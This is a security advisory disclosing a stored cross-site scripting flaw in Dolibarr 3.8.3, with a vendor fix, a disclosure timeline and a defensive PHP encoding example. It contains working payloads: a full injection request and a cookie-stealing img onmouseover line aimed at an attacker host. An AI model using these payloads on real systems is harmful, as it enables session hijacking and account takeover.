
Dolibarr 3.8.3 Cross Site Scripting

Posted Jan 11, 2016
Authored by Mickael Dorigny | Site synetis.com

Dolibarr version 3.8.3 suffers from a stored cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | c17ecf80d34e2c761ee7e596af78927c7c4accbc17e3e897ce53a789bd3b1784

######################################################################
# Exploit Title: XSS on dolibarr 3.8.3
# Date: 03/01/2016
# Author: Mickael Dorigny @ Synetis
# Vendor or Software Link: http://www.dolibarr.org/
# Category: XSS
######################################################################

Dolibarr description :
======================================================================
Dolibarr ERP & CRM is a modern and easy-to-use web application for managing your business (contacts, invoices, orders, products, stocks, agenda, emailings, etc.).

It is open-source, free software designed for small companies, foundations and freelancers.
You can install and use it as a standalone application, or online on a shared or dedicated server to use it from anywhere. Dolibarr is also available on ready-to-use cloud services.

Vulnerability description :
======================================================================
A stored XSS exists in the Dolibarr 3.8.3 core code. No module needs to be activated to exploit it, because an attacker can use the user attributes management to do so.

This XSS can be exploited from a basic user account on the Dolibarr installation. Impacted users are administrators and any users who have the right to view other users' attributes.

PoC n°1 : Stored XSS in user attributes:
======================================================================
Once a simple user is logged in with his account, he can modify his attributes such as Last name, First name, Mobile number, etc. This information can be reviewed by other users who have administration privileges.

Note that some basic protections are applied just after the form is submitted. They do not allow the attacker to use well-known JavaScript tricks such as "<script>" tags or the "onerror" event handler, but other event handlers are still allowed.

Using the <IMG> HTML tag and the "onmouseover" JavaScript event, we can rely on an admin moving his mouse over the injected image. This event can be used to execute arbitrary JavaScript in the administrator's browser, or in the browser of any other user allowed to view user attributes.

PoC :
As an authenticated user, fill the "Last name", "First name", "email", "job" or "signature" input with this:
user1<img src=x onmouseover=alert(1)>

[REQUEST]
http://server/dolibarr/htdocs/user/card.php?id=2
[POSTDATA]
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="token"
3e01b40f4659396870a384c16213e400
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="action"
update
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="entity"
1
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="lastname"
user1<img src=x onmouseover=alert(1)>
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="photo"; filename=""
Content-Type: application/octet-stream
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="firstname"
user1<img src=x onmouseover=alert(1)>
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="job"
user1<img src=x onmouseover=alert(1)>
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="gender"
man
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="login"
user1
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="password"
user1
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="admin"
0
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="superadmin"
0
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="office_phone"

-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="user_mobile"

-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="office_fax"

-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="email"
user1<img src=x onmouseover=alert(1)>
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="signature"
user1<img src=x onmouseover=alert(1)>
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="fk_user"
-1
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="weeklyhours"
0
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="save"
Save
-----------------------------7677991721297181448923571907--

Note that the "First name" and "Last name" inputs are displayed in the "List of users" page, but they are truncated after 50 characters. This truncation limits the XSS payloads that can be used there. We can use the "signature" input of the same HTML form to insert more JavaScript instructions. Admins will then see this signature when they click on a user in the "List of users" to see all his attributes.

The image insertion can target an existing or a non-existent image. A small tip to increase the chance of trapping an admin is to upload a very large image (e.g. 1920*1080) that covers the whole page.

Once the attributes are modified, another user such as an admin can view them and then executes the JavaScript instructions by moving his mouse over the injected image. Here is another PoC that sends the admin's cookie to a website controlled by the attacker using an HTTP GET request. Inject this payload in the "signature" input:
<img src=x onmouseover=document.location="http://hackerserver?c="+document.cookie+"">

Using this vulnerability, an attacker could tamper with page rendering, redirect the victim to a fake login page, or capture user credentials such as cookies.
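The bypass described above comes down to a blacklist that knows about "<script>" and "onerror" but not about other event attributes. As an added illustration (not Dolibarr's code and not its actual fix, which is in the linked commit), the constructed weak_blacklist() stand-in below mimics that behaviour, while render_attribute() shows the contextual output encoding with htmlspecialchars() that makes the stored value inert regardless of which handler it carries:

```php
<?php
// Added example, not Dolibarr's code. weak_blacklist() is a constructed
// stand-in for the protection the advisory describes (blocks <script> and
// "onerror", nothing else); render_attribute() is the defensive alternative.

// Blacklist: strips <script> tags and onerror handlers, knows no other event.
function weak_blacklist(string $value): string
{
    // Remove opening and closing <script> tags (the text between them stays,
    // which is harmless once the tags are gone).
    $value = preg_replace('#<\s*/?\s*script[^>]*>#i', '', $value);
    // Remove onerror="..." / onerror='...' / onerror=bare attributes.
    $value = preg_replace('#\s+onerror\s*=\s*("[^"]*"|\'[^\']*\'|[^\s>]+)#i', '', $value);
    return $value;
}

// Output encoding: the stored value is rendered as HTML text, so every
// character with HTML meaning is escaped. No tag or attribute can be formed.
function render_attribute(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Defender-side check for stored data: is there still any HTML tag left
// after the blacklist ran? Useful to audit existing user records.
function contains_markup(string $value): bool
{
    return preg_match('#<\s*[a-z][^>]*>#i', $value) === 1;
}

// Payload quoted in the advisory, and a constructed one the blacklist does catch.
$payload = 'user1<img src=x onmouseover=alert(1)>';
$blocked = 'user1<script>alert(1)</script><img src=x onerror=alert(1)>';

printf("blacklist on blocked payload : %s\n", weak_blacklist($blocked));
printf("blacklist on advisory payload: %s\n", weak_blacklist($payload));
printf("still contains markup        : %s\n", contains_markup(weak_blacklist($payload)) ? 'yes' : 'no');
printf("encoded for HTML             : %s\n", render_attribute($payload));
```

The advisory payload passes weak_blacklist() untouched because no blacklist can enumerate every event attribute, whereas render_attribute() neutralises it without needing to know which handler was used.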


Screenshots :
======================================================================
- http://www.information-security.fr/wp-content/uploads/2016/01/dolibarr-3.8.3-xss-stored-03.jpg
- http://www.information-security.fr/wp-content/uploads/2016/01/dolibarr-3.8.3-xss-stored-04.jpg
- http://www.information-security.fr/wp-content/uploads/2016/01/dolibarr-3.8.3-xss-stored-05.jpg

Solution:
======================================================================

The fix for this vulnerability is available in the Dolibarr GitHub repository: https://github.com/Dolibarr/dolibarr/issues/4341 / https://github.com/Dolibarr/dolibarr/commit/36dc8b1ce79c972c867b804778c5b780caea8a56

Additional resources :
======================================================================
- https://www.youtube.com/watch?v=p2rFWJOCJC8
- http://www.information-security.fr/en/xss-dolibarr-version-3-8-3/
- https://github.com/Dolibarr/dolibarr/issues/4341
- https://github.com/Dolibarr/dolibarr/commit/36dc8b1ce79c972c867b804778c5b780caea8a56


Report timeline :
======================================================================
2016-01-03 : Vendor informed of the vulnerability
2016-01-07 : Vulnerability fixed
2016-01-11 : Advisory published

Credits :
======================================================================

SYNETIS - www.synetis.com
Consulting firm in management and information security

Mickael Dorigny - Security Consultant @ Synetis | Information-Security.fr

--
SYNETIS
CONTACT: www.synetis.com | www.information-security.fr